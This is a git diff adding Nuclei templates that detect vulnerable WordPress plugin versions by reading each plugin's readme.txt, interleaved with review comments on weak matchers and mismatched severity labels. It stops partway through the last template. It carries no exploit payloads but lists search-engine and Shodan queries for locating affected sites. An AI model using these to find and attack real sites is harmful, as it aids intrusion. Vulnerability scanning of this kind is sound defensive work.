diff --git a/poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml b/poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml
new file mode 100644
index 0000000000..09d49a755b
--- /dev/null
+++ b/poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b
+
+info:
+ name: >
+ Friends <= 3.2.1 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+ The Friends plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in all versions up to, and including, 3.2.1. This makes it possible for unauthenticated attackers to send arbitrary friend requests on behalf of another website, accept the friend request for the targeted website, and then communicate with the site as an accepted friend.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/980b16d4-3c4a-4ed1-af46-f39f3ec6dd19?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-12028
+ metadata:
+ fofa-query: "wp-content/plugins/friends/"
+ google-query: inurl:"/wp-content/plugins/friends/"
+ shodan-query: 'vuln:CVE-2024-12028'
+ tags: cve,wordpress,wp-plugin,friends,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/friends/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "friends"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.1')
\ No newline at end of file
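Review bot: The word matcher `"friends"` is an ordinary English word, so it adds almost nothing to the check: with `redirects: true`, any 200 response that contains a `Stable tag:` line and that word somewhere in the body satisfies all three matchers. Anchoring on the readme header is tighter, for example `- "=== Friends ==="`, assuming the plugin's readme follows the standard WordPress header; confirm against the shipped file. Separately, `severity: high` and the `high` tag overstate `cvss-score: 5.3`, which is in the medium band.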
diff --git a/poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml b/poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml
new file mode 100644
index 0000000000..e5ca86e4ff
--- /dev/null
+++ b/poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e
+
+info:
+ name: >
+ WP Media Optimizer (.webp) <= 1.4.0 - Reflected Cross-Site Scripting via wpmowebp-css-resources and wpmowebp-js-resources Parameters
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Media Optimizer (.webp) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘wpmowebp-css-resources’ and 'wpmowebp-js-resources' parameters in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/183d1be9-4c05-4107-b039-3711034ef774?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12060
+ metadata:
+ fofa-query: "wp-content/plugins/wp-media-optimizer-webp/"
+ google-query: inurl:"/wp-content/plugins/wp-media-optimizer-webp/"
+ shodan-query: 'vuln:CVE-2024-12060'
+ tags: cve,wordpress,wp-plugin,wp-media-optimizer-webp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-media-optimizer-webp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-media-optimizer-webp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml b/poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml
new file mode 100644
index 0000000000..909b18140c
--- /dev/null
+++ b/poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa
+
+info:
+ name: >
+ Gold Addons for Elementor <= 1.3.2 - Missing Authorization to Authenticated (Subscriber+) License Activation/Deactivation
+ author: topscoder
+ severity: low
+ description: >
+ The Gold Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the activate() and deactivate() functions in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate and deactivate licenses.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e103afe-3ae7-413f-92b2-0e4dd9436f3e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-12110
+ metadata:
+ fofa-query: "wp-content/plugins/gold-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/gold-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-12110'
+ tags: cve,wordpress,wp-plugin,gold-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gold-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gold-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832.yaml b/poc/cve/CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832.yaml
new file mode 100644
index 0000000000..a31de04437
--- /dev/null
+++ b/poc/cve/CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832
+
+info:
+ name: >
+ SV100 Companion <= 2.0.02 - Missing Authorization to Unuathenticated Arbitrary Options Update
+ author: topscoder
+ severity: high
+ description: >
+ The SV100 Companion plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the settings_import() function in all versions up to, and including, 2.0.02. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c244eb33-acaf-460b-ae1d-6688b21cc60f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-12155
+ metadata:
+ fofa-query: "wp-content/plugins/sv100-companion/"
+ google-query: inurl:"/wp-content/plugins/sv100-companion/"
+ shodan-query: 'vuln:CVE-2024-12155'
+ tags: cve,wordpress,wp-plugin,sv100-companion,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sv100-companion/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sv100-companion"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.02')
\ No newline at end of file
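Review bot: `severity: high` understates this entry: the `classification` block gives `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` with `cvss-score: 9.8`, and the description is an unauthenticated options update that leads to administrator access. I would use `severity: critical` and replace the trailing `high` tag with `critical` so the finding sorts first in triage. The bound `'<= 2.0.02'` also has a zero-padded last segment; it is worth confirming that `compare_versions` treats `2.0.02` and a readme value of `2.0.2` as equal, otherwise the boundary release is missed.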
diff --git a/poc/cve/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml b/poc/cve/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml
new file mode 100644
index 0000000000..e491cf118e
--- /dev/null
+++ b/poc/cve/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21
+
+info:
+ name: >
+ Pretty Simple Popup Builder <= 1.0.9 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Pretty Simple Popup Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9489f066-5898-4908-b3aa-cf856958cb4e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-39626
+ metadata:
+ fofa-query: "wp-content/plugins/pretty-simple-popup-builder/"
+ google-query: inurl:"/wp-content/plugins/pretty-simple-popup-builder/"
+ shodan-query: 'vuln:CVE-2024-39626'
+ tags: cve,wordpress,wp-plugin,pretty-simple-popup-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pretty-simple-popup-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pretty-simple-popup-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
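Review bot: The description limits impact to multi-site installations and sites where `unfiltered_html` has been disabled, but the matchers fire on every install whose readme reports a `Stable tag` at or below 1.0.9. The template cannot observe either precondition from `readme.txt`, so most hits will be sites where an administrator can already post unfiltered HTML and the finding does not apply. I would record that next to the check with a comment above `http:`, `# Match reports the installed version only; impact requires multisite or unfiltered_html disabled.`, so that whoever triages the result knows to verify the precondition.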
diff --git a/poc/cve/CVE-2024-4271-7e84de8005b7402b3460842595eb6a21.yaml b/poc/cve/CVE-2024-4271-7e84de8005b7402b3460842595eb6a21.yaml
new file mode 100644
index 0000000000..b37f170d55
--- /dev/null
+++ b/poc/cve/CVE-2024-4271-7e84de8005b7402b3460842595eb6a21.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-4271-7e84de8005b7402b3460842595eb6a21
+
+info:
+ name: >
+ SVGator – Add Animated SVG Easily <= 1.2.6 - Authenticated (Author+) Stored Cross-Site Scripting via SVG
+ author: topscoder
+ severity: low
+ description: >
+ The SVGator – Add Animated SVG Easily plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a82fd49e-6e95-4743-900a-fa53b870ec0b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-4271
+ metadata:
+ fofa-query: "wp-content/plugins/svgator/"
+ google-query: inurl:"/wp-content/plugins/svgator/"
+ shodan-query: 'vuln:CVE-2024-4271'
+ tags: cve,wordpress,wp-plugin,svgator,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/svgator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "svgator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-4633-a45a113bbd0240e2736131a0f29a199f.yaml b/poc/cve/CVE-2024-4633-a45a113bbd0240e2736131a0f29a199f.yaml
new file mode 100644
index 0000000000..82673d32f1
--- /dev/null
+++ b/poc/cve/CVE-2024-4633-a45a113bbd0240e2736131a0f29a199f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-4633-a45a113bbd0240e2736131a0f29a199f
+
+info:
+ name: >
+ Slider & Popup Builder by Depicter – Add Image Slider, Carousel Slider, Exit Intent Popup, Popup Modal, Coupon Popup, Post Slider Carousel <= 3.2.1- Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Slider and Carousel slider by Depicter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘addExtraMimeType’ function in versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/965cacd3-1786-4e7d-8209-eea293b161d3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-4633
+ metadata:
+ fofa-query: "wp-content/plugins/depicter/"
+ google-query: inurl:"/wp-content/plugins/depicter/"
+ shodan-query: 'vuln:CVE-2024-4633'
+ tags: cve,wordpress,wp-plugin,depicter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/depicter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "depicter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-49232-5f4d040123f64c3c6cdaa6e80c6cdc46.yaml b/poc/cve/CVE-2024-49232-5f4d040123f64c3c6cdaa6e80c6cdc46.yaml
new file mode 100644
index 0000000000..cde6194313
--- /dev/null
+++ b/poc/cve/CVE-2024-49232-5f4d040123f64c3c6cdaa6e80c6cdc46.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-49232-5f4d040123f64c3c6cdaa6e80c6cdc46
+
+info:
+ name: >
+ El mejor Cluster <= 1.1.15 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The El mejor Cluster plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d119ee0-4c16-46b1-ae45-8e0c6de0081b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-49232
+ metadata:
+ fofa-query: "wp-content/plugins/mejorcluster/"
+ google-query: inurl:"/wp-content/plugins/mejorcluster/"
+ shodan-query: 'vuln:CVE-2024-49232'
+ tags: cve,wordpress,wp-plugin,mejorcluster,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mejorcluster/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mejorcluster"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.15')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-49665-0c7cde70a3364f6417c8986330b177f2.yaml b/poc/cve/CVE-2024-49665-0c7cde70a3364f6417c8986330b177f2.yaml
new file mode 100644
index 0000000000..6f51768e85
--- /dev/null
+++ b/poc/cve/CVE-2024-49665-0c7cde70a3364f6417c8986330b177f2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-49665-0c7cde70a3364f6417c8986330b177f2
+
+info:
+ name: >
+ Web Bricks Addons for Elementor <= 1.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Web Bricks Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/429f697c-e101-4fc3-ab9f-557c932bded5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-49665
+ metadata:
+ fofa-query: "wp-content/plugins/webbricks-addons/"
+ google-query: inurl:"/wp-content/plugins/webbricks-addons/"
+ shodan-query: 'vuln:CVE-2024-49665'
+ tags: cve,wordpress,wp-plugin,webbricks-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/webbricks-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "webbricks-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-52436-793469b5c4fe6748676f0c6f113984fc.yaml b/poc/cve/CVE-2024-52436-793469b5c4fe6748676f0c6f113984fc.yaml
new file mode 100644
index 0000000000..4f66f199e3
--- /dev/null
+++ b/poc/cve/CVE-2024-52436-793469b5c4fe6748676f0c6f113984fc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-52436-793469b5c4fe6748676f0c6f113984fc
+
+info:
+ name: >
+ Post SMTP <= 2.9.9 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Post SMTP plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/faa6ecad-1430-4300-b314-53619d69837b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 4.9
+ cve-id: CVE-2024-52436
+ metadata:
+ fofa-query: "wp-content/plugins/post-smtp/"
+ google-query: inurl:"/wp-content/plugins/post-smtp/"
+ shodan-query: 'vuln:CVE-2024-52436'
+ tags: cve,wordpress,wp-plugin,post-smtp,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "post-smtp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.9.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53740-3512f8e780249684a6674da83d240a21.yaml b/poc/cve/CVE-2024-53740-3512f8e780249684a6674da83d240a21.yaml
new file mode 100644
index 0000000000..d59c4529da
--- /dev/null
+++ b/poc/cve/CVE-2024-53740-3512f8e780249684a6674da83d240a21.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53740-3512f8e780249684a6674da83d240a21
+
+info:
+ name: >
+ WooCommerce Ultimate Gift Card - Create, Sell and Manage Gift Cards with Customized Email Templates < 2.9.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WooCommerce Ultimate Gift Card - Create, Sell and Manage Gift Cards with Customized Email Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to 2.9.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/859e9233-1e5d-4430-87c1-bcd8225b6258?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53740
+ metadata:
+ fofa-query: "wp-content/plugins/woocommerce-ultimate-gift-card/"
+ google-query: inurl:"/wp-content/plugins/woocommerce-ultimate-gift-card/"
+ shodan-query: 'vuln:CVE-2024-53740'
+ tags: cve,wordpress,wp-plugin,woocommerce-ultimate-gift-card,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce-ultimate-gift-card/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woocommerce-ultimate-gift-card"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '< 2.9.1')
\ No newline at end of file
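Review bot: The finding rests entirely on the `Stable tag:` line of readme.txt, so a readme whose tag is non-numeric (for example `trunk`) yields no `version` capture and the `compare_versions(version, '< 2.9.1')` matcher presumably never fires, giving a silent negative on a possibly vulnerable install. A match likewise shows only what the readme advertises, not that the affected code is present or reachable. I would document that limit above `http:` with a comment such as `# Version-only detection from readme.txt; a non-match is not evidence of a patched install`, so that scan results are triaged accordingly. The same request, extractor and matcher block is repeated in the other templates this commit adds.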
diff --git a/poc/cve/CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e.yaml b/poc/cve/CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e.yaml
new file mode 100644
index 0000000000..ed33c25e7f
--- /dev/null
+++ b/poc/cve/CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e
+
+info:
+ name: >
+ Simple Popup <= 4.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Simple Popup plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e993667f-8275-4078-afd5-b26ff8528ab4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53741
+ metadata:
+ fofa-query: "wp-content/plugins/simple-popup-plugin/"
+ google-query: inurl:"/wp-content/plugins/simple-popup-plugin/"
+ shodan-query: 'vuln:CVE-2024-53741'
+ tags: cve,wordpress,wp-plugin,simple-popup-plugin,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-popup-plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-popup-plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.6')
\ No newline at end of file
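Review bot: `severity: low` and the trailing `low` tag disagree with `cvss-score: 6.4` in the same `info` block, which is in the CVSS v3.1 medium band (4.0-6.9), so anyone filtering scans by severity will miss a finding the vector rates as medium. If the downgrade is a deliberate rule for issues that need an authenticated contributor, it should be stated in a comment; otherwise I would change the lines to `severity: medium` and `tags: cve,wordpress,wp-plugin,simple-popup-plugin,medium`. The same low/6.4 pairing appears in the templates for CVE-2024-53743 through CVE-2024-53749 and CVE-2024-53752 in this commit.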
diff --git a/poc/cve/CVE-2024-53742-0f8484e9711afc6f54dffab08b8fb64d.yaml b/poc/cve/CVE-2024-53742-0f8484e9711afc6f54dffab08b8fb64d.yaml
new file mode 100644
index 0000000000..33f0bbc0f3
--- /dev/null
+++ b/poc/cve/CVE-2024-53742-0f8484e9711afc6f54dffab08b8fb64d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53742-0f8484e9711afc6f54dffab08b8fb64d
+
+info:
+ name: >
+ Multilevel Referral Affiliate Plugin for WooCommerce <= 2.27 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Multilevel Referral Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c820ff17-718d-4e3a-9a46-7d5a4a573f78?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53742
+ metadata:
+ fofa-query: "wp-content/plugins/multilevel-referral-plugin-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/multilevel-referral-plugin-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-53742'
